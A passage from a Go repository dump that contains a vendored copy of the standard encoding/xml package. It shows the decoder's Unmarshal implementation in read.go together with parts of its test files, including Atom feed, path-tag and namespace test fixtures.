err != nil { t.Errorf("enc.Flush: %s", err) } if buf.Len() == 0 { t.Errorf("enc.EncodeToken: empty buffer") } want := "" if buf.String() != want { t.Errorf("enc.EncodeToken: expected %q; got %q", want, buf.String()) } } // Issue 16158. Decoder.unmarshalAttr ignores the return value of copyValue. func TestIssue16158(t *testing.T) { const data = `` err := Unmarshal([]byte(data), &struct { B byte `xml:"b,attr,omitempty"` }{}) if err == nil { t.Errorf("Unmarshal: expected error, got nil") } } // Issue 20953. Crash on invalid XMLName attribute. type InvalidXMLName struct { XMLName Name `xml:"error"` Type struct { XMLName Name `xml:"type,attr"` } } func TestInvalidXMLName(t *testing.T) { var buf bytes.Buffer enc := NewEncoder(&buf) if err := enc.Encode(InvalidXMLName{}); err == nil { t.Error("unexpected success") } else if want := "invalid tag"; !strings.Contains(err.Error(), want) { t.Errorf("error %q does not contain %q", err, want) } } // Issue 50164. Crash on zero value XML attribute. type LayerOne struct { XMLName Name `xml:"l1"` Value *float64 `xml:"value,omitempty"` *LayerTwo `xml:",omitempty"` } type LayerTwo struct { ValueTwo *int `xml:"value_two,attr,omitempty"` } func TestMarshalZeroValue(t *testing.T) { proofXml := `1.2345` var l1 LayerOne err := Unmarshal([]byte(proofXml), &l1) if err != nil { t.Fatalf("unmarshal XML error: %v", err) } want := float64(1.2345) got := *l1.Value if got != want { t.Fatalf("unexpected unmarshal result, want %f but got %f", want, got) } // Marshal again (or Encode again) // In issue 50164, here `Marshal(l1)` will panic because of the zero value of xml attribute ValueTwo `value_two`. anotherXML, err := Marshal(l1) if err != nil { t.Fatalf("marshal XML error: %v", err) } if string(anotherXML) != proofXml { t.Fatalf("unexpected unmarshal result, want %q but got %q", proofXml, anotherXML) } } var closeTests = []struct { desc string toks []Token want string err string }{{ desc: "unclosed start element", toks: []Token{ StartElement{Name{"", "foo"}, nil, false, ""}, }, want: ``, err: "unclosed tag ", }, { desc: "closed element", toks: []Token{ StartElement{Name{"", "foo"}, nil, false, ""}, EndElement{Name{"", "foo"}, false}, }, want: ``, }, { desc: "directive", toks: []Token{ Directive("foo"), }, want: ``, }} func TestClose(t *testing.T) { for _, tt := range closeTests { tt := tt t.Run(tt.desc, func(t *testing.T) { var out strings.Builder enc := NewEncoder(&out) for j, tok := range tt.toks { if err := enc.EncodeToken(tok); err != nil { t.Fatalf("token #%d: %v", j, err) } } err := enc.Close() switch { case tt.err != "" && err == nil: t.Error(" expected error; got none") case tt.err == "" && err != nil: t.Errorf(" got error: %v", err) case tt.err != "" && err != nil && tt.err != err.Error(): t.Errorf(" error mismatch; got %v, want %v", err, tt.err) } if got := out.String(); got != tt.want { t.Errorf("\ngot %v\nwant %v", got, tt.want) } t.Log(enc.p.closed) if err := enc.EncodeToken(Directive("foo")); err == nil { t.Errorf("unexpected success when encoding after Close") } }) } } ================================================ FILE: internal/thirdparty/xml/read.go ================================================ // Copyright 2009 The Go Authors. All rights reserved. // Use of this source code is governed by a BSD-style // license that can be found in the LICENSE file. package xml import ( "bytes" "encoding" "errors" "fmt" "reflect" "runtime" "strconv" "strings" ) // BUG(rsc): Mapping between XML elements and data structures is inherently flawed: // an XML element is an order-dependent collection of anonymous // values, while a data structure is an order-independent collection // of named values. // See [encoding/json] for a textual representation more suitable // to data structures. // Unmarshal parses the XML-encoded data and stores the result in // the value pointed to by v, which must be an arbitrary struct, // slice, or string. Well-formed data that does not fit into v is // discarded. // // Because Unmarshal uses the reflect package, it can only assign // to exported (upper case) fields. Unmarshal uses a case-sensitive // comparison to match XML element names to tag values and struct // field names. // // Unmarshal maps an XML element to a struct using the following rules. // In the rules, the tag of a field refers to the value associated with the // key 'xml' in the struct field's tag (see the example above). // // - If the struct has a field of type []byte or string with tag // ",innerxml", Unmarshal accumulates the raw XML nested inside the // element in that field. The rest of the rules still apply. // // - If the struct has a field named XMLName of type Name, // Unmarshal records the element name in that field. // // - If the XMLName field has an associated tag of the form // "name" or "namespace-URL name", the XML element must have // the given name (and, optionally, name space) or else Unmarshal // returns an error. // // - If the XML element has an attribute whose name matches a // struct field name with an associated tag containing ",attr" or // the explicit name in a struct field tag of the form "name,attr", // Unmarshal records the attribute value in that field. // // - If the XML element has an attribute not handled by the previous // rule and the struct has a field with an associated tag containing // ",any,attr", Unmarshal records the attribute value in the first // such field. // // - If the XML element contains character data, that data is // accumulated in the first struct field that has tag ",chardata". // The struct field may have type []byte or string. // If there is no such field, the character data is discarded. // // - If the XML element contains comments, they are accumulated in // the first struct field that has tag ",comment". The struct // field may have type []byte or string. If there is no such // field, the comments are discarded. // // - If the XML element contains a sub-element whose name matches // the prefix of a tag formatted as "a" or "a>b>c", unmarshal // will descend into the XML structure looking for elements with the // given names, and will map the innermost elements to that struct // field. A tag starting with ">" is equivalent to one starting // with the field name followed by ">". // // - If the XML element contains a sub-element whose name matches // a struct field's XMLName tag and the struct field has no // explicit name tag as per the previous rule, unmarshal maps // the sub-element to that struct field. // // - If the XML element contains a sub-element whose name matches a // field without any mode flags (",attr", ",chardata", etc), Unmarshal // maps the sub-element to that struct field. // // - If the XML element contains a sub-element that hasn't matched any // of the above rules and the struct has a field with tag ",any", // unmarshal maps the sub-element to that struct field. // // - An anonymous struct field is handled as if the fields of its // value were part of the outer struct. // // - A struct field with tag "-" is never unmarshaled into. // // If Unmarshal encounters a field type that implements the Unmarshaler // interface, Unmarshal calls its UnmarshalXML method to produce the value from // the XML element. Otherwise, if the value implements // [encoding.TextUnmarshaler], Unmarshal calls that value's UnmarshalText method. // // Unmarshal maps an XML element to a string or []byte by saving the // concatenation of that element's character data in the string or // []byte. The saved []byte is never nil. // // Unmarshal maps an attribute value to a string or []byte by saving // the value in the string or slice. // // Unmarshal maps an attribute value to an [Attr] by saving the attribute, // including its name, in the Attr. // // Unmarshal maps an XML element or attribute value to a slice by // extending the length of the slice and mapping the element or attribute // to the newly created value. // // Unmarshal maps an XML element or attribute value to a bool by // setting it to the boolean value represented by the string. Whitespace // is trimmed and ignored. // // Unmarshal maps an XML element or attribute value to an integer or // floating-point field by setting the field to the result of // interpreting the string value in decimal. There is no check for // overflow. Whitespace is trimmed and ignored. // // Unmarshal maps an XML element to a Name by recording the element // name. // // Unmarshal maps an XML element to a pointer by setting the pointer // to a freshly allocated value and then mapping the element to that value. // // A missing element or empty attribute value will be unmarshaled as a zero value. // If the field is a slice, a zero value will be appended to the field. Otherwise, the // field will be set to its zero value. func Unmarshal(data []byte, v any) error { return NewDecoder(bytes.NewReader(data)).Decode(v) } // Decode works like [Unmarshal], except it reads the decoder // stream to find the start element. func (d *Decoder) Decode(v any) error { return d.DecodeElement(v, nil) } // DecodeElement works like [Unmarshal] except that it takes // a pointer to the start XML element to decode into v. // It is useful when a client reads some raw XML tokens itself // but also wants to defer to [Unmarshal] for some elements. func (d *Decoder) DecodeElement(v any, start *StartElement) error { val := reflect.ValueOf(v) if val.Kind() != reflect.Pointer { return errors.New("non-pointer passed to Unmarshal") } if val.IsNil() { return errors.New("nil pointer passed to Unmarshal") } return d.unmarshal(val.Elem(), start, 0) } // An UnmarshalError represents an error in the unmarshaling process. type UnmarshalError string func (e UnmarshalError) Error() string { return string(e) } // Unmarshaler is the interface implemented by objects that can unmarshal // an XML element description of themselves. // // UnmarshalXML decodes a single XML element // beginning with the given start element. // If it returns an error, the outer call to Unmarshal stops and // returns that error. // UnmarshalXML must consume exactly one XML element. // One common implementation strategy is to unmarshal into // a separate value with a layout matching the expected XML // using d.DecodeElement, and then to copy the data from // that value into the receiver. // Another common strategy is to use d.Token to process the // XML object one token at a time. // UnmarshalXML may not use d.RawToken. type Unmarshaler interface { UnmarshalXML(d *Decoder, start StartElement) error } // UnmarshalerAttr is the interface implemented by objects that can unmarshal // an XML attribute description of themselves. // // UnmarshalXMLAttr decodes a single XML attribute. // If it returns an error, the outer call to [Unmarshal] stops and // returns that error. // UnmarshalXMLAttr is used only for struct fields with the // "attr" option in the field tag. type UnmarshalerAttr interface { UnmarshalXMLAttr(attr Attr) error } // receiverType returns the receiver type to use in an expression like "%s.MethodName". func receiverType(val any) string { t := reflect.TypeOf(val) if t.Name() != "" { return t.String() } return "(" + t.String() + ")" } // unmarshalInterface unmarshals a single XML element into val. // start is the opening tag of the element. func (d *Decoder) unmarshalInterface(val Unmarshaler, start *StartElement) error { // Record that decoder must stop at end tag corresponding to start. d.pushEOF() d.unmarshalDepth++ err := val.UnmarshalXML(d, *start) d.unmarshalDepth-- if err != nil { d.popEOF() return err } if !d.popEOF() { return fmt.Errorf("xml: %s.UnmarshalXML did not consume entire <%s> element", receiverType(val), start.Name.Local) } return nil } // unmarshalTextInterface unmarshals a single XML element into val. // The chardata contained in the element (but not its children) // is passed to the text unmarshaler. func (d *Decoder) unmarshalTextInterface(val encoding.TextUnmarshaler) error { var buf []byte depth := 1 for depth > 0 { t, err := d.Token() if err != nil { return err } switch t := t.(type) { case CharData: if depth == 1 { buf = append(buf, t.data...) } case StartElement: depth++ case EndElement: depth-- } } return val.UnmarshalText(buf) } // unmarshalAttr unmarshals a single XML attribute into val. func (d *Decoder) unmarshalAttr(val reflect.Value, attr Attr) error { if val.Kind() == reflect.Pointer { if val.IsNil() { val.Set(reflect.New(val.Type().Elem())) } val = val.Elem() } if val.CanInterface() && val.Type().Implements(unmarshalerAttrType) { // This is an unmarshaler with a non-pointer receiver, // so it's likely to be incorrect, but we do what we're told. return val.Interface().(UnmarshalerAttr).UnmarshalXMLAttr(attr) } if val.CanAddr() { pv := val.Addr() if pv.CanInterface() && pv.Type().Implements(unmarshalerAttrType) { return pv.Interface().(UnmarshalerAttr).UnmarshalXMLAttr(attr) } } // Not an UnmarshalerAttr; try encoding.TextUnmarshaler. if val.CanInterface() && val.Type().Implements(textUnmarshalerType) { // This is an unmarshaler with a non-pointer receiver, // so it's likely to be incorrect, but we do what we're told. return val.Interface().(encoding.TextUnmarshaler).UnmarshalText([]byte(attr.Value)) } if val.CanAddr() { pv := val.Addr() if pv.CanInterface() && pv.Type().Implements(textUnmarshalerType) { return pv.Interface().(encoding.TextUnmarshaler).UnmarshalText([]byte(attr.Value)) } } if val.Type().Kind() == reflect.Slice && val.Type().Elem().Kind() != reflect.Uint8 { // Slice of element values. // Grow slice. n := val.Len() val.Grow(1) val.SetLen(n + 1) // Recur to read element into slice. if err := d.unmarshalAttr(val.Index(n), attr); err != nil { val.SetLen(n) return err } return nil } if val.Type() == attrType { val.Set(reflect.ValueOf(attr)) return nil } return copyValue(val, []byte(attr.Value)) } var ( attrType = reflect.TypeFor[Attr]() unmarshalerType = reflect.TypeFor[Unmarshaler]() unmarshalerAttrType = reflect.TypeFor[UnmarshalerAttr]() textUnmarshalerType = reflect.TypeFor[encoding.TextUnmarshaler]() ) const ( maxUnmarshalDepth = 10000 maxUnmarshalDepthWasm = 5000 // go.dev/issue/56498 ) var errUnmarshalDepth = errors.New("exceeded max depth") // Unmarshal a single XML element into val. func (d *Decoder) unmarshal(val reflect.Value, start *StartElement, depth int) error { if depth >= maxUnmarshalDepth || runtime.GOARCH == "wasm" && depth >= maxUnmarshalDepthWasm { return errUnmarshalDepth } // Find start element if we need it. if start == nil { for { tok, err := d.Token() if err != nil { return err } if t, ok := tok.(StartElement); ok { start = &t break } } } // Load value from interface, but only if the result will be // usefully addressable. if val.Kind() == reflect.Interface && !val.IsNil() { e := val.Elem() if e.Kind() == reflect.Pointer && !e.IsNil() { val = e } } if val.Kind() == reflect.Pointer { if val.IsNil() { val.Set(reflect.New(val.Type().Elem())) } val = val.Elem() } if val.CanInterface() && val.Type().Implements(unmarshalerType) { // This is an unmarshaler with a non-pointer receiver, // so it's likely to be incorrect, but we do what we're told. return d.unmarshalInterface(val.Interface().(Unmarshaler), start) } if val.CanAddr() { pv := val.Addr() if pv.CanInterface() && pv.Type().Implements(unmarshalerType) { return d.unmarshalInterface(pv.Interface().(Unmarshaler), start) } } if val.CanInterface() && val.Type().Implements(textUnmarshalerType) { return d.unmarshalTextInterface(val.Interface().(encoding.TextUnmarshaler)) } if val.CanAddr() { pv := val.Addr() if pv.CanInterface() && pv.Type().Implements(textUnmarshalerType) { return d.unmarshalTextInterface(pv.Interface().(encoding.TextUnmarshaler)) } } var ( data []byte saveData reflect.Value comment []byte saveComment reflect.Value saveXML reflect.Value saveXMLIndex int saveXMLData []byte saveAny reflect.Value sv reflect.Value tinfo *typeInfo err error ) switch v := val; v.Kind() { default: return errors.New("unknown type " + v.Type().String()) case reflect.Interface: // TODO: For now, simply ignore the field. In the near // future we may choose to unmarshal the start // element on it, if not nil. return d.Skip() case reflect.Slice: typ := v.Type() if typ.Elem().Kind() == reflect.Uint8 { // []byte saveData = v break } // Slice of element values. // Grow slice. n := v.Len() v.Grow(1) v.SetLen(n + 1) // Recur to read element into slice. if err := d.unmarshal(v.Index(n), start, depth+1); err != nil { v.SetLen(n) return err } return nil case reflect.Bool, reflect.Float32, reflect.Float64, reflect.Int, reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64, reflect.Uint, reflect.Uint8, reflect.Uint16, reflect.Uint32, reflect.Uint64, reflect.Uintptr, reflect.String: saveData = v case reflect.Struct: typ := v.Type() if typ == nameType { v.Set(reflect.ValueOf(start.Name)) break } sv = v tinfo, err = getTypeInfo(typ) if err != nil { return err } // Validate and assign element name. if tinfo.xmlname != nil { finfo := tinfo.xmlname if finfo.name != "" && finfo.name != start.Name.Local { return UnmarshalError("expected element type <" + finfo.name + "> but have <" + start.Name.Local + ">") } if finfo.xmlns != "" && finfo.xmlns != start.Name.Space { e := "expected element <" + finfo.name + "> in name space " + finfo.xmlns + " but have " if start.Name.Space == "" { e += "no name space" } else { e += start.Name.Space } return UnmarshalError(e) } fv := finfo.value(sv, initNilPointers) if _, ok := fv.Interface().(Name); ok { fv.Set(reflect.ValueOf(start.Name)) } } // Assign attributes. for _, a := range start.Attr { handled := false any := -1 for i := range tinfo.fields { finfo := &tinfo.fields[i] switch finfo.flags & fMode { case fAttr: strv := finfo.value(sv, initNilPointers) if a.Name.Local == finfo.name && (finfo.xmlns == "" || finfo.xmlns == a.Name.Space) { if err := d.unmarshalAttr(strv, a); err != nil { return err } handled = true } case fAny | fAttr: if any == -1 { any = i } } } if !handled && any >= 0 { finfo := &tinfo.fields[any] strv := finfo.value(sv, initNilPointers) if err := d.unmarshalAttr(strv, a); err != nil { return err } } } // Determine whether we need to save character data or comments. for i := range tinfo.fields { finfo := &tinfo.fields[i] switch finfo.flags & fMode { case fCDATA, fCharData: if !saveData.IsValid() { saveData = finfo.value(sv, initNilPointers) } case fComment: if !saveComment.IsValid() { saveComment = finfo.value(sv, initNilPointers) } case fAny, fAny | fElement: if !saveAny.IsValid() { saveAny = finfo.value(sv, initNilPointers) } case fInnerXML: if !saveXML.IsValid() { saveXML = finfo.value(sv, initNilPointers) if d.saved == nil { saveXMLIndex = 0 d.saved = new(bytes.Buffer) } else { saveXMLIndex = d.savedOffset() } } } } } // Find end element. // Process sub-elements along the way. Loop: for { var savedOffset int if saveXML.IsValid() { savedOffset = d.savedOffset() } tok, err := d.Token() if err != nil { return err } switch t := tok.(type) { case StartElement: consumed := false if sv.IsValid() { // unmarshalPath can call unmarshal, so we need to pass the depth through so that // we can continue to enforce the maximum recursion limit. consumed, err = d.unmarshalPath(tinfo, sv, nil, &t, depth) if err != nil { return err } if !consumed && saveAny.IsValid() { consumed = true if err := d.unmarshal(saveAny, &t, depth+1); err != nil { return err } } } if !consumed { if err := d.Skip(); err != nil { return err } } case EndElement: if saveXML.IsValid() { saveXMLData = d.saved.Bytes()[saveXMLIndex:savedOffset] if saveXMLIndex == 0 { d.saved = nil } } break Loop case CharData: if saveData.IsValid() { data = append(data, t.data...) } case Comment: if saveComment.IsValid() { comment = append(comment, t...) } } } if saveData.IsValid() && saveData.CanInterface() && saveData.Type().Implements(textUnmarshalerType) { if err := saveData.Interface().(encoding.TextUnmarshaler).UnmarshalText(data); err != nil { return err } saveData = reflect.Value{} } if saveData.IsValid() && saveData.CanAddr() { pv := saveData.Addr() if pv.CanInterface() && pv.Type().Implements(textUnmarshalerType) { if err := pv.Interface().(encoding.TextUnmarshaler).UnmarshalText(data); err != nil { return err } saveData = reflect.Value{} } } if err := copyValue(saveData, data); err != nil { return err } switch t := saveComment; t.Kind() { case reflect.String: t.SetString(string(comment)) case reflect.Slice: t.Set(reflect.ValueOf(comment)) } switch t := saveXML; t.Kind() { case reflect.String: t.SetString(string(saveXMLData)) case reflect.Slice: if t.Type().Elem().Kind() == reflect.Uint8 { t.Set(reflect.ValueOf(saveXMLData)) } } return nil } func copyValue(dst reflect.Value, src []byte) (err error) { dst0 := dst if dst.Kind() == reflect.Pointer { if dst.IsNil() { dst.Set(reflect.New(dst.Type().Elem())) } dst = dst.Elem() } // Save accumulated data. switch dst.Kind() { case reflect.Invalid: // Probably a comment. default: return errors.New("cannot unmarshal into " + dst0.Type().String()) case reflect.Int, reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64: if len(src) == 0 { dst.SetInt(0) return nil } itmp, err := strconv.ParseInt(strings.TrimSpace(string(src)), 10, dst.Type().Bits()) if err != nil { return err } dst.SetInt(itmp) case reflect.Uint, reflect.Uint8, reflect.Uint16, reflect.Uint32, reflect.Uint64, reflect.Uintptr: if len(src) == 0 { dst.SetUint(0) return nil } utmp, err := strconv.ParseUint(strings.TrimSpace(string(src)), 10, dst.Type().Bits()) if err != nil { return err } dst.SetUint(utmp) case reflect.Float32, reflect.Float64: if len(src) == 0 { dst.SetFloat(0) return nil } ftmp, err := strconv.ParseFloat(strings.TrimSpace(string(src)), dst.Type().Bits()) if err != nil { return err } dst.SetFloat(ftmp) case reflect.Bool: if len(src) == 0 { dst.SetBool(false) return nil } value, err := strconv.ParseBool(strings.TrimSpace(string(src))) if err != nil { return err } dst.SetBool(value) case reflect.String: dst.SetString(string(src)) case reflect.Slice: if len(src) == 0 { // non-nil to flag presence src = []byte{} } dst.SetBytes(src) } return nil } // unmarshalPath walks down an XML structure looking for wanted // paths, and calls unmarshal on them. // The consumed result tells whether XML elements have been consumed // from the Decoder until start's matching end element, or if it's // still untouched because start is uninteresting for sv's fields. func (d *Decoder) unmarshalPath(tinfo *typeInfo, sv reflect.Value, parents []string, start *StartElement, depth int) (consumed bool, err error) { recurse := false Loop: for i := range tinfo.fields { finfo := &tinfo.fields[i] if finfo.flags&fElement == 0 || len(finfo.parents) < len(parents) || finfo.xmlns != "" && finfo.xmlns != start.Name.Space { continue } for j := range parents { if parents[j] != finfo.parents[j] { continue Loop } } if len(finfo.parents) == len(parents) && finfo.name == start.Name.Local { // It's a perfect match, unmarshal the field. return true, d.unmarshal(finfo.value(sv, initNilPointers), start, depth+1) } if len(finfo.parents) > len(parents) && finfo.parents[len(parents)] == start.Name.Local { // It's a prefix for the field. Break and recurse // since it's not ok for one field path to be itself // the prefix for another field path. recurse = true // We can reuse the same slice as long as we // don't try to append to it. parents = finfo.parents[:len(parents)+1] break } } if !recurse { // We have no business with this element. return false, nil } // The element is not a perfect match for any field, but one // or more fields have the path to this element as a parent // prefix. Recurse and attempt to match these. for { var tok Token tok, err = d.Token() if err != nil { return true, err } switch t := tok.(type) { case StartElement: // the recursion depth of unmarshalPath is limited to the path length specified // by the struct field tag, so we don't increment the depth here. consumed2, err := d.unmarshalPath(tinfo, sv, parents, &t, depth) if err != nil { return true, err } if !consumed2 { if err := d.Skip(); err != nil { return true, err } } case EndElement: return true, nil } } } // Skip reads tokens until it has consumed the end element // matching the most recent start element already consumed, // skipping nested structures. // It returns nil if it finds an end element matching the start // element; otherwise it returns an error describing the problem. func (d *Decoder) Skip() error { var depth int64 for { tok, err := d.Token() if err != nil { return err } switch tok.(type) { case StartElement: depth++ case EndElement: if depth == 0 { return nil } depth-- } } } ================================================ FILE: internal/thirdparty/xml/read_test.go ================================================ // Copyright 2009 The Go Authors. All rights reserved. // Use of this source code is governed by a BSD-style // license that can be found in the LICENSE file. package xml import ( "bytes" "errors" "io" "reflect" "runtime" "strings" "testing" "time" ) // Stripped down Atom feed data structures. func TestUnmarshalFeed(t *testing.T) { var f Feed if err := Unmarshal([]byte(atomFeedString), &f); err != nil { t.Fatalf("Unmarshal: %s", err) } if !reflect.DeepEqual(f, atomFeed) { t.Fatalf("have %#v\nwant %#v", f, atomFeed) } } // hget http://codereview.appspot.com/rss/mine/rsc const atomFeedString = ` Code Review - My issueshttp://codereview.appspot.com/rietveld<>rietveld: an attempt at pubsubhubbub 2009-10-04T01:35:58+00:00email-address-removedurn:md5:134d9179c41f806be79b3a5f7877d19a An attempt at adding pubsubhubbub support to Rietveld. http://code.google.com/p/pubsubhubbub http://code.google.com/p/rietveld/issues/detail?id=155 The server side of the protocol is trivial: 1. add a &lt;link rel=&quot;hub&quot; href=&quot;hub-server&quot;&gt; tag to all feeds that will be pubsubhubbubbed. 2. every time one of those feeds changes, tell the hub with a simple POST request. I have tested this by adding debug prints to a local hub server and checking that the server got the right publish requests. I can&#39;t quite get the server to work, but I think the bug is not in my code. I think that the server expects to be able to grab the feed and see the feed&#39;s actual URL in the link rel=&quot;self&quot;, but the default value for that drops the :port from the URL, and I cannot for the life of me figure out how to get the Atom generator deep inside django not to do that, or even where it is doing that, or even what code is running to generate the Atom feed. (I thought I knew but I added some assert False statements and it kept running!) Ignoring that particular problem, I would appreciate feedback on the right way to get the two values at the top of feeds.py marked NOTE(rsc). rietveld: correct tab handling 2009-10-03T23:02:17+00:00email-address-removedurn:md5:0a2a4f19bb815101f0ba2904aed7c35a This fixes the buggy tab rendering that can be seen at http://codereview.appspot.com/116075/diff/1/2 The fundamental problem was that the tab code was not being told what column the text began in, so it didn&#39;t know where to put the tab stops. Another problem was that some of the code assumed that string byte offsets were the same as column offsets, which is only true if there are no tabs. In the process of fixing this, I cleaned up the arguments to Fold and ExpandTabs and renamed them Break and _ExpandTabs so that I could be sure that I found all the call sites. I also wanted to verify that ExpandTabs was not being used from outside intra_region_diff.py. ` type Feed struct { XMLName Name `xml:"http://www.w3.org/2005/Atom feed"` Title string `xml:"title"` ID string `xml:"id"` Link []Link `xml:"link"` Updated time.Time `xml:"updated,attr"` Author Person `xml:"author"` Entry []Entry `xml:"entry"` } type Entry struct { Title string `xml:"title"` ID string `xml:"id"` Link []Link `xml:"link"` Updated time.Time `xml:"updated"` Author Person `xml:"author"` Summary Text `xml:"summary"` } type Link struct { Rel string `xml:"rel,attr,omitempty"` Href string `xml:"href,attr"` } type Person struct { Name string `xml:"name"` URI string `xml:"uri"` Email string `xml:"email"` InnerXML string `xml:",innerxml"` } type Text struct { Type string `xml:"type,attr,omitempty"` Body string `xml:",chardata"` } var atomFeed = Feed{ XMLName: Name{"http://www.w3.org/2005/Atom", "feed"}, Title: "Code Review - My issues", Link: []Link{ {Rel: "alternate", Href: "http://codereview.appspot.com/"}, {Rel: "self", Href: "http://codereview.appspot.com/rss/mine/rsc"}, }, ID: "http://codereview.appspot.com/", Updated: ParseTime("2009-10-04T01:35:58+00:00"), Author: Person{ Name: "rietveld<>", InnerXML: "rietveld<>", }, Entry: []Entry{ { Title: "rietveld: an attempt at pubsubhubbub\n", Link: []Link{ {Rel: "alternate", Href: "http://codereview.appspot.com/126085"}, }, Updated: ParseTime("2009-10-04T01:35:58+00:00"), Author: Person{ Name: "email-address-removed", InnerXML: "email-address-removed", }, ID: "urn:md5:134d9179c41f806be79b3a5f7877d19a", Summary: Text{ Type: "html", Body: ` An attempt at adding pubsubhubbub support to Rietveld. http://code.google.com/p/pubsubhubbub http://code.google.com/p/rietveld/issues/detail?id=155 The server side of the protocol is trivial: 1. add a <link rel="hub" href="hub-server"> tag to all feeds that will be pubsubhubbubbed. 2. every time one of those feeds changes, tell the hub with a simple POST request. I have tested this by adding debug prints to a local hub server and checking that the server got the right publish requests. I can't quite get the server to work, but I think the bug is not in my code. I think that the server expects to be able to grab the feed and see the feed's actual URL in the link rel="self", but the default value for that drops the :port from the URL, and I cannot for the life of me figure out how to get the Atom generator deep inside django not to do that, or even where it is doing that, or even what code is running to generate the Atom feed. (I thought I knew but I added some assert False statements and it kept running!) Ignoring that particular problem, I would appreciate feedback on the right way to get the two values at the top of feeds.py marked NOTE(rsc). `, }, }, { Title: "rietveld: correct tab handling\n", Link: []Link{ {Rel: "alternate", Href: "http://codereview.appspot.com/124106"}, }, Updated: ParseTime("2009-10-03T23:02:17+00:00"), Author: Person{ Name: "email-address-removed", InnerXML: "email-address-removed", }, ID: "urn:md5:0a2a4f19bb815101f0ba2904aed7c35a", Summary: Text{ Type: "html", Body: ` This fixes the buggy tab rendering that can be seen at http://codereview.appspot.com/116075/diff/1/2 The fundamental problem was that the tab code was not being told what column the text began in, so it didn't know where to put the tab stops. Another problem was that some of the code assumed that string byte offsets were the same as column offsets, which is only true if there are no tabs. In the process of fixing this, I cleaned up the arguments to Fold and ExpandTabs and renamed them Break and _ExpandTabs so that I could be sure that I found all the call sites. I also wanted to verify that ExpandTabs was not being used from outside intra_region_diff.py. `, }, }, }, } const pathTestString = ` 1 A B C D <_> E 2 ` type PathTestItem struct { Value string } type PathTestA struct { Items []PathTestItem `xml:">Item1"` Before, After string } type PathTestB struct { Other []PathTestItem `xml:"Items>Item1"` Before, After string } type PathTestC struct { Values1 []string `xml:"Items>Item1>Value"` Values2 []string `xml:"Items>Item2>Value"` Before, After string } type PathTestSet struct { Item1 []PathTestItem } type PathTestD struct { Other PathTestSet `xml:"Items"` Before, After string } type PathTestE struct { Underline string `xml:"Items>_>Value"` Before, After string } var pathTests = []any{ &PathTestA{Items: []PathTestItem{{"A"}, {"D"}}, Before: "1", After: "2"}, &PathTestB{Other: []PathTestItem{{"A"}, {"D"}}, Before: "1", After: "2"}, &PathTestC{Values1: []string{"A", "C", "D"}, Values2: []string{"B"}, Before: "1", After: "2"}, &PathTestD{Other: PathTestSet{Item1: []PathTestItem{{"A"}, {"D"}}}, Before: "1", After: "2"}, &PathTestE{Underline: "E", Before: "1", After: "2"}, } func TestUnmarshalPaths(t *testing.T) { for _, pt := range pathTests { v := reflect.New(reflect.TypeOf(pt).Elem()).Interface() if err := Unmarshal([]byte(pathTestString), v); err != nil { t.Fatalf("Unmarshal: %s", err) } if !reflect.DeepEqual(v, pt) { t.Fatalf("have %#v\nwant %#v", v, pt) } } } type BadPathTestA struct { First string `xml:"items>item1"` Other string `xml:"items>item2"` Second string `xml:"items"` } type BadPathTestB struct { Other string `xml:"items>item2>value"` First string `xml:"items>item1"` Second string `xml:"items>item1>value"` } type BadPathTestC struct { First string Second string `xml:"First"` } type BadPathTestD struct { BadPathEmbeddedA BadPathEmbeddedB } type BadPathEmbeddedA struct { First string } type BadPathEmbeddedB struct { Second string `xml:"First"` } var badPathTests = []struct { v, e any }{ {&BadPathTestA{}, &TagPathError{reflect.TypeFor[BadPathTestA](), "First", "items>item1", "Second", "items"}}, {&BadPathTestB{}, &TagPathError{reflect.TypeFor[BadPathTestB](), "First", "items>item1", "Second", "items>item1>value"}}, {&BadPathTestC{}, &TagPathError{reflect.TypeFor[BadPathTestC](), "First", "", "Second", "First"}}, {&BadPathTestD{}, &TagPathError{reflect.TypeFor[BadPathTestD](), "First", "", "Second", "First"}}, } func TestUnmarshalBadPaths(t *testing.T) { for _, tt := range badPathTests { err := Unmarshal([]byte(pathTestString), tt.v) if !reflect.DeepEqual(err, tt.e) { t.Fatalf("Unmarshal with %#v didn't fail properly:\nhave %#v,\nwant %#v", tt.v, err, tt.e) } } } const OK = "OK" const withoutNameTypeData = ` ` type TestThree struct { XMLName Name `xml:"Test3"` Attr string `xml:",attr"` } func TestUnmarshalWithoutNameType(t *testing.T) { var x TestThree if err := Unmarshal([]byte(withoutNameTypeData), &x); err != nil { t.Fatalf("Unmarshal: %s", err) } if x.Attr != OK { t.Fatalf("have %v\nwant %v", x.Attr, OK) } } func TestUnmarshalAttr(t *testing.T) { type ParamVal struct { Int int `xml:"int,attr"` } type ParamPtr struct { Int *int `xml:"int,attr"` } type ParamStringPtr struct { Int *string `xml:"int,attr"` } x := []byte(``) p1 := &ParamPtr{} if err := Unmarshal(x, p1); err != nil { t.Fatalf("Unmarshal: %s", err) } if p1.Int == nil { t.Fatalf("Unmarshal failed in to *int field") } else if *p1.Int != 1 { t.Fatalf("Unmarshal with %s failed:\nhave %#v,\n want %#v", x, p1.Int, 1) } p2 := &ParamVal{} if err := Unmarshal(x, p2); err != nil { t.Fatalf("Unmarshal: %s", err) } if p2.Int != 1 { t.Fatalf("Unmarshal with %s failed:\nhave %#v,\n want %#v", x, p2.Int, 1) } p3 := &ParamStringPtr{} if err := Unmarshal(x, p3); err != nil { t.Fatalf("Unmarshal: %s", err) } if p3.Int == nil { t.Fatalf("Unmarshal failed in to *string field") } else if *p3.Int != "1" { t.Fatalf("Unmarshal with %s failed:\nhave %#v,\n want %#v", x, p3.Int, 1) } } type Tables struct { HTable string `xml:"http://www.w3.org/TR/html4/ table"` FTable string `xml:"http://www.w3schools.com/furniture table"` } var tables = []struct { xml string tab Tables ns string }{ { xml: `` + `hello
` + `world
` + ``, tab: Tables{"hello", "world"}, }, { xml: `` + `world
` + `hello
` + ``, tab: Tables{"hello", "world"}, }, { xml: `` + `world` + `hello` + ``, tab: Tables{"hello", "world"}, }, { xml: `` + `bogus
` + ``, tab: Tables{}, }, { xml: `` + `only
` + ``, tab: Tables{HTable: "only"}, ns: "http://www.w3.org/TR/html4/", }, { xml: `` + `only
` + ``, tab: Tables{FTable: "only"}, ns: "http://www.w3schools.com/furniture", }, { xml: `` + `only
